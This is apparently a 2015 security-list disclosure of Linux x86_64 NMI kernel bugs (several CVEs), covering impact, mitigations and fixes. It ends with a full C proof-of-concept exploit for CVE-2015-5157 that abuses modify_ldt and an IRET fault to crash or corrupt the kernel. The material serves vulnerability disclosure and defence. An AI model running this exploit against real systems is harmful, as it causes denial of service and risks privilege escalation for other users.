Date: Wed, 22 Jul 2015 11:12:00 -0700
From: Andy Lutomirski <>
To: oss security list <>, 
	"" <>
Subject: Linux x86_64 NMI security issues

x86 has a woefully poorly designed NMI mechanism.  Linux uses it for
profiling.  The tricks that keep NMIs from nesting improperly are
complicated, as are the tricks that try to handle things like NMI
watchdogs and physical buttons without proper status registers.  On
x86_64 it's particularly bad due to a nasty interaction with SYSCALL.

Perhaps unsurprisingly, the implementation was incorrect in a few corner cases.

+++++ CVE-2015-3291 +++++

Malicious user code can cause some fraction of NMIs to be ignored.
(Off the top of my head, it might work 25% of the time.)  This happens
when user code points RSP to the kernel's NMI stack and executes
SYSCALL.  An NMI that occurs before the kernel updates RSP or that
occurs between when the kernel restores RSP and executes SYSRET will
take the wrong code path through the NMI handler and be ignored.

This has probably existed since Linux 3.3.  The impact is extremely
low.  Fixed by:

+++++ CVE-2015-5157 +++++

Petr Matousek and I discovered that an NMI that interrupts userspace
and encounters an IRET fault is incorrectly handled.  Symptoms range
from an OOPS to possible corruption or privilege escalation.  I
haven't verified how much corruption is possible or on what kernel
versions it occurs.  Some form of crash has likely been possible since
3.3, and I believe the attached exploit can trigger it on 3.13 and
newer.

On kernels that are patched for BadIRET and have a fixup_bad_iret
function (which should be most kernels that are keeping up with
low-level security issues), there are two cases.

Case 1a (more up-to-date kernels where INTERRUPT_RETURN is "jmp
irq_return"): fixup_bad_iret will be invoked and will attempt to
recover.  There's a narrow window in which a new NMI will cause
corruption, in which case all bets are off.  That could hang, crash,
or possibly be exploited for privilege escalation.

Case 1b (less up-to-date kernels where INTERRUPT_RETURN is "iretq"):
The kernel will try to OOPS due to a bad kernel fault, except that the
OOPS will be processed with the wrong gsbase.  This is basically the
BadIRET condition, and is probably exploitable using similar
techniques to BadIRET.

Case 2 (kernels that are not patched for BadIRET): I didn't analyze
it.  BadIRET is a much worse vulnerability and you should fix it.  If
you have just the minimal BadIRET fix but not fixup_bad_iret, the
impact is probably similar to Case 1a except that the window for
corruption is much larger.

On some of these kernels, it can take quite a while for the exploit to
do anything.

Mitigations: Use seccomp to disable perf_event_open or modify_ldt, or
run with only a single CPU.  To my knowledge, this cannot be exploited
on single-processor systems or in single-threaded applications.

Fixed by:

Alternatively worked around by:

although the latter patch is incompatible with Xen.

+++++ NMI bug, no CVE assigned +++++

On a kernel with the first of the two patches above but not the
second, the attached CVE-2015-5157 exploit can cause severe log spam.

I don't think this fundamentally depends on the first of the patches,
but I haven't been able to reproduce it without that patch.  On the
other hand, I haven't tried that hard.

+++++ CVE-2015-3290 +++++

High-impact NMI bug on x86_64 systems running 3.13 and newer; details
are embargoed for now.  Also fixed by:

The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.

You can mitigate CVE-2015-3290 by blocking modify_ldt or
perf_event_open using seccomp.  A fully-functional, portable, reliable
exploit is privately available and will be published in a week or two.
*Patch your systems*

Note: several of these fixes depend on a few patches immediately
before them.  The NMI stack switching fix also depends on changes made
in 4.2; it will appear to apply to older kernels but will crash them.
I have a different variant that's more portable.

Andy Lutomirski
AMA Capital Management, LLC

/*
 * Copyright (c) 2015 Andrew Lutomirski
 * GPL v2
 * Exploit for CVE-2015-5157, a denial of service.
 * Build with:
 *   gcc -m32 -O2 -o CVE-2015-5157 CVE-2015-5157.c -pthread
 * Run it and follow directions.
 */

#define _GNU_SOURCE

#include <sys/time.h>
#include <time.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <sys/signal.h>
#include <sys/ucontext.h>
#include <asm/ldt.h>
#include <err.h>
#include <setjmp.h>
#include <pthread.h>
#include <linux/futex.h>
#include <errno.h>
#include <sched.h>	/* cpu_set_t, CPU_SET, sched_setaffinity */

static void set_cs(unsigned short cs)
{
#ifdef __x86_64__
	asm volatile (
		"   pushq	%0		\n\t"
		"   call	1f		\n\t"
		"1: addq	$2f-1b, (%%rsp)	\n\t"
		"   lretq			\n\t"
		"2:"
		: : "r" ((unsigned long)cs));
#else
	asm volatile (
		"   pushl	%0		\n\t"
		"   call	1f		\n\t"
		"1: addl	$2f-1b, (%%esp)	\n\t"
		"   lretl			\n\t"
		"2:"
		: : "r" ((unsigned int)cs));
#endif
}

static void sethandler(int sig, void (*handler)(int, siginfo_t *, void *),
		       int flags)
{
	struct sigaction sa;
	memset(&sa, 0, sizeof(sa));
	sa.sa_sigaction = handler;
	sa.sa_flags = SA_SIGINFO | flags;
	sigemptyset(&sa.sa_mask);
	if (sigaction(sig, &sa, 0))
		err(1, "sigaction");
}


static void set_ldt(void)
{
	/* Install a 32-bit code segment at LDT entry 0. */
	const struct user_desc desc = {
		.entry_number    = 0,
		.base_addr       = 0,
		.limit           = 0xfffff,
		.seg_32bit       = 1,
		.contents        = 2, /* Code, not conforming */
		.read_exec_only  = 0,
		.limit_in_pages  = 1,
		.seg_not_present = 0,
		.useable         = 0
	};

	if (syscall(SYS_modify_ldt, 1, &desc, sizeof(desc)) != 0)
		err(1, "modify_ldt");
}

static void clear_ldt(void)
{
	/* An all-zero descriptor in an oldmode write clears entry 0. */
	const struct user_desc desc = {};
	if (syscall(SYS_modify_ldt, 1, &desc, sizeof(desc)) != 0)
		err(1, "modify_ldt");
}

static jmp_buf jmpbuf;
static volatile unsigned int ftx;

static void sigsegv(int sig, siginfo_t *info, void *ctx_void)
{
	if (ftx == 1) {
		printf("Unexpected SEGV\n");
		_exit(1);
	}

	siglongjmp(jmpbuf, 1);
}

static void *threadproc(void *ctx)
{
	cpu_set_t cpuset;
	CPU_ZERO(&cpuset);
	CPU_SET(1, &cpuset);
	if (sched_setaffinity(0, sizeof(cpuset), &cpuset) != 0) {
		if (errno == EINVAL)
			errx(1, "Failed to bind to CPU 1 -- make sure you have at least two CPUs");
		err(1, "sched_setaffinity to CPU 1");
	}

	while (1) {
		/* Wait for the main thread to install the doomed segment. */
		syscall(SYS_futex, &ftx, FUTEX_WAIT, 0, NULL, NULL, 0);
		while (ftx != 2)
			;	/* spin until the main thread is running on it */
		clear_ldt();
		ftx = 0;
	}
}

int main(int argc, char **argv)
{
	pthread_t thread;

	printf("This test runs forever.  Press Ctrl-C if you get bored.\n"
	       "If nothing happens, then either your kernel is okay\n"
	       "or you didn't abuse perf appropriately.\n"
	       "Run me under heavy perf load.  For example:\n"
	       "perf record -o /dev/null -e cycles -e instructions -c 10000 %s\n", argv[0]);

	if (pthread_create(&thread, 0, threadproc, 0) != 0)
		err(1, "pthread_create");

	cpu_set_t cpuset;
	CPU_ZERO(&cpuset);
	CPU_SET(0, &cpuset);
	if (sched_setaffinity(0, sizeof(cpuset), &cpuset) != 0)
		err(1, "sched_setaffinity to CPU 0");

	sethandler(SIGSEGV, sigsegv, 0);
	sigsetjmp(jmpbuf, 1);
	while (ftx != 0)
		;	/* wait for the helper thread to reset state */

#ifdef __x86_64__
// We can't add a 64-bit code segment to the LDT
#error Build as 32-bit
#endif

	set_ldt();

	ftx = 1;
	syscall(SYS_futex, &ftx, FUTEX_WAKE, 1, NULL, NULL, 0);

	/* Run on the LDT code segment: selector 0x7 is entry 0, TI=LDT, RPL 3. */
	set_cs(0x7);

	ftx = 2;

	/*
	 * Spin until the helper thread clears the LDT out from under us;
	 * the IRET fault on the next return to this loop is the trigger.
	 */
	while (1)
		;
}
